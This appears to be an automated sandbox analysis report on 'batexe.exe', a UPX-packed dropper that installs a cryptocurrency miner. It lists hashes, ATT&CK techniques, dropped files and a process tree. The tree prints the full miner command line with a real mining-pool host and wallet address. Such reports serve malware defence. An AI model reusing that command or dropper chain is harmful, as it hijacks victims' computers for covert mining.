73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
14/02/2024, 04:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1540	b2e.exe
1704	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1704	cpuminer-sse2.exe
1704	cpuminer-sse2.exe
1704	cpuminer-sse2.exe
1704	cpuminer-sse2.exe
1704	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2852-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2852 wrote to memory of 1540	2852	batexe.exe	85
PID 2852 wrote to memory of 1540	2852	batexe.exe	85
PID 2852 wrote to memory of 1540	2852	batexe.exe	85
PID 1540 wrote to memory of 3528	1540	b2e.exe	86
PID 1540 wrote to memory of 3528	1540	b2e.exe	86
PID 1540 wrote to memory of 3528	1540	b2e.exe	86
PID 3528 wrote to memory of 1704	3528	cmd.exe	89
PID 3528 wrote to memory of 1704	3528	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2852
- C:\Users\Admin\AppData\Local\Temp\6C75.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6C75.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6C75.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6FA2.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3528
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6C75.tmp\b2e.exe

Filesize
15.9MB

MD5
4d2ae14b34d18f94a70d835af63b89c5

SHA1
77e17f9f59196eeace5c5f6dab86dfb71db0fbbb

SHA256
12c269a1afa4ef6f0deacc972a4ecb7442170962594416d723cbcf7a4eac258b

SHA512
7bcaa4b8a7fa4a911716ad5dbacb0fee4dad08dff7bfc323575c04b5640a2660c556630f97d281ac19bce1dfb41e0f36a07c70abfd80b57b4f75f82d4e27c3ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\6C75.tmp\b2e.exe

Filesize
5.4MB

MD5
20849d500adf882d9a36df3ea9fc9f81

SHA1
eec879d9e0f3689133b0daf337f731aed78da9a6

SHA256
694d25cc4b227106f92ce13d2f713a087d7477676c0ccc88b7adf63bbef0e02b

SHA512
a5427289e40cbaa1cee14b1d1a6f3e00d7728d74bf082e25d9c72291576b6fba4b6a2dcaf7f3a1f84e2c68d7328cc985c853f602c7a75fd1bfb1f978af756296

Download Submit
C:\Users\Admin\AppData\Local\Temp\6C75.tmp\b2e.exe

Filesize
4.5MB

MD5
15fe3b622166db04c27b3fcb5ceffb24

SHA1
a794100da106418811d553ba4bf0827f5db2a1ad

SHA256
5607b3451e0f482583e6ecab18a8220ca3adda2ae9cf33d4de26b2ad52702343

SHA512
a1568593ceba6c60da1fda21ae76e2c154db826f85163663a2aa02cd70ffd4dc1577060fe320bf0cf07bdf83945cd52a57f417fed60a730b7c2a38569404f2c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\6FA2.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
912KB

MD5
67a29cd13b7c9eb6c22abb8d91bdb3b0

SHA1
b656bd88610c6e556a3227a1ec05e4b930b2bae1

SHA256
468c9e4f0b058677f9a0c82fc1274be69c9f8933c0a65a429cced4f814f45416

SHA512
3f8621e3be925e6b4abf660fb436c335f27c9d092814e9777d08173f667f8eb5d3ffc3d7ae986b3cdcb447a85b56da832a13eeb39c955936d3c929af1bba6ebe

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
730KB

MD5
58ebd647f793c6629bd09d291b1abe26

SHA1
40e6c352aff4124899b897a43424c46bfdfbff61

SHA256
28ab2a7166ffc03a55938b99e1bc98520678e152a2a252cebac800618cd3181e

SHA512
3dc4efdb43d60d02fc59d1fe6d378be54d152084ee05a133a6c41961f9d0072a3a02be4fb1bed51f9c8d9d82baabe0b01a501994af5b5e783130aff2541f75e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
821KB

MD5
fa95663537adc67656f589628bb44220

SHA1
7fab95818358534ebcab6c406b9eaa98cfe7c60d

SHA256
e0c50f17cd215ccb55cfabc4f96debac01f19861cf2adaeb99facee46726af13

SHA512
b865ff0e0dcd54425ada60735e0c612967d5ac4a808aa4afe0ef9f960f4dcf0527de9613473f2918cb7de85f4616c5fb84bd75018fdcc9d109aa853cad22b2ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
7c0c35a156ba18c325c70b743e63b260

SHA1
88748d0b256fc826d9222ea603fa57e130195afa

SHA256
7939152f1aaa45472ee7cbeecf76dd5d4e57403364fd0719fa8d05aaf3ebd9b5

SHA512
45e8d669aa6442480331cc130450b2ed72f11ebacb90f2f752069877cdba62342f1ed248b69fdaaffefe19c4a7f56f566155302fc685887f2be12c0410e98ca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
929KB

MD5
ecf4440ced14ececdc42df6cf2482e9c

SHA1
84b5c90f75c75399fb2ff53267eed0ab2b9f2393

SHA256
c62f5a8c222fe2477fe9b7b4a825351e0af34f9efffba391b87440f4d43be679

SHA512
3d9966787a39b0707e0e8bfee67dcffc2a986eccbe4b5102cf71b71d5880ebfb7f34c1e2277a209ba47dfc66183aa482117b94cb6ae21f1fab78e862aa6de26b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
b98bf2006609509f5c9e825b053728c1

SHA1
9250c1c700d727517c49ee47f1b1ef11b8847f4e

SHA256
cad106482fa5f59fa7c9d4f1601553331be305b07ed83377bf9b97a6e22f1f02

SHA512
f52b347902b9733a80034487a4705ec57b44addef514d5f5e96387b22e031b3283bef1a9b6bde00b9ccb40c189983aad6f5b78929d30a4448ac5052d4f6bb022

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1540-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1540-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1704-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1704-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1704-45-0x0000000067D60000-0x0000000067DF8000-memory.dmp

Filesize
608KB

Download
memory/1704-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1704-47-0x0000000001140000-0x00000000029F5000-memory.dmp

Filesize
24.7MB

Download
memory/1704-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1704-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1704-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1704-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1704-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1704-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1704-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1704-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1704-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2852-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download